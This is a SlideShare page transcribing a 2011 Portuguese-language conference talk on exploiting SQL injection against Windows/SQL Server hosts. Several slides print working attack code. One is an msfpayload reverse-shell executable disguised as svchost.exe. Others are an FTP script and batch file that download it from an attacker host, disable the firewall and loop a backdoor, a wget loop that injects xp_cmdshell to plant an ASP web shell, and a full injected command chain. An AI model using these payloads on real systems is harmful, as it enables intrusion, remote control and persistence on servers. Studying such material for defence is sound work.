Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]

844 views

Published on

Vale Security Conference - 2011
Sábado - 3ª Palestra
Palestrante : Rener Alberto (Gr1nch) [DC Labs]
Palestra : SQL Injection - Pwning a Windows box!!!
Twitter (Rener Alberto) : https://twitter.com/#!/Gr1nchDC
Vídeo da Palestra (You Tube) : http://www.youtube.com/watch?v=hpGU44BHPvo
Slide (SlideShare) : http://www.slideshare.net/valesecconf/gr1nch

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
844
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
18
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]

  1. 1. SQL Injection Pwning aWindows Box! Rêner Alberto / Gr1nch
  2. 2. AGENDA Como encontrar a falha? Explorando a moda antiga. Stored Procedures. E.B.G: Demo Shell reverso via SQLi E.B.G: Demo Upload ASP com SQLi Ferramentas para SQLi: – Demo SQLMAP – Demo Havij Momento Capivara
  3. 3. Como encontrar a falha?  A velha história dos inputs.  DEMO Google Scans.  Fuzzing.  Demo: Gr1nch Scan
  4. 4. DEMO GR1nch SQLi Scan
  5. 5. Explorando a moda antigaHackeando a aplicação web. Demo: – Obtendo informações pelos erros. – Enumerando os campos da tabela. – Descobrindo o tipo do campo. – Add um user válido. – Game Over!
  6. 6. Stored Procedures Funções do SQL Server úteis no SQLi:1) xp_cmdshell: Execução de comandos MS-DOS2) xp_regread: Ler valores do registro3) xp_regwrite: Escrever no registro.4) xp_dirtree / xp_subdirs: Listar diretorios.5) xp_fixeddrives: Exibir os HDs.6) sp_makewebtask: DUMP do banco (REMOVIDA!)
  7. 7. A técnica do E.B.G E= Exploit B= Baseado G= Gambiarra Pequenas variações na forma de atacar podem significar em um bypass nos sistemas de proteção. Utilize a criativadade quando for explorar uma falha. Nem todo mundo precisa explorar da mesma forma...
  8. 8. E.B.G:Shell Windows via SQLi
  9. 9. Shell Windows via SQLiUtilizando o MetaSploit para criar um XPL:msfpayload windows/shell_reverse_tcp LHOST=192.168.XXX.XXXLPORT=???? X > /FTP/svchost.exeArquivo gr1nch.txt:------------------------------------------------------------- open XXX.XXX.XXX.XXX 21 USER gr1nch p4s$w0rd binary get svchost.exe %temp%svchost.exe quitArquivo d00r.bat:------------------------------------------------------------ cd %temp% ftp -i -n -v -s:%temp%gr1nch.txt :backd00r netsh firewall set opmode mode = disable svchost.exe goto backd00r
  10. 10. Upload CMD.ASP via SQLiE.B.G. Code:while read linedoSQL_STRING=$(echo -n "$line" | hexdump -v -e"#" 1/1 "%02X" | sed -e s:#:%:g)wget --post-data="username=;exec%20xp_cmdshell%20echo%20"$SQL_STRING"%20>>%20c:inetpubwwwrootgr1nch.asp--"http://192.168.2.50/process_login.asp >>/dev/null 2>&1done < gr1nch.asprm process_login.*
  11. 11. E.B.G DEMO 1Lets Hack!
  12. 12. Shell Windows via SQLiE.B.G. Code:;exec xp_cmdshell echo open XXX.XXX.XXX.XXX 21 > %temp%gr1nch.txt;exec xp_cmdshell echo USER d3f4c3rDcLabs@2009 >> %temp%gr1nch.txt;exec xp_cmdshell echobinary >> %temp%gr1nch.txt;exec xp_cmdshell echo getnc.exe %temp%svchost.exe >> %temp%gr1nch.txt;execxp_cmdshell echo get xpl.asp %temp%xpl.asp >> %temp%gr1nch.txt;exec xp_cmdshell echo quit >> %temp%gr1nch.txt;exec xp_cmdshell echo cd %temp% > %temp%d00r.bat;exec xp_cmdshell echo ftp -i -n -v -s:%temp%gr1nch.txt >> %temp%d00r.bat;exec xp_cmdshellecho :backd00r >> %temp%d00r.bat;exec xp_cmdshellecho netsh firewall set opmode mode = disable >> %temp%d00r.bat;exec xp_cmdshell echo svchost.exe >> %temp%d00r.bat;exec xp_cmdshell echo goto backd00r >>%temp%d00r.bat;exec xp_cmdshell %temp%d00r.bat-----------------------------------------------------------------------------------------------
  13. 13. E.B.G DEMO 2Lets Hack!
  14. 14. Ferramentas de SQLi Ferramentas foram feitas para auxiliar seu trabalho não para trabalhar por você. Utilizar uma ferramenta de ataque sem conhecimento não faz de você um hacker. DEMO utilizando o SQLMAP DEMO utilizando o HAVIJ
  15. 15. Momento CapivaraDúvidas, Elogios ou Blasfêmias?
  16. 16. Obrigado! Mail: gr1nch@dclabs.com.br Twitter: @Gr1nchDC IRC: irc.freenode.net /j #DcLabs Site: www.dclabs.com.br

×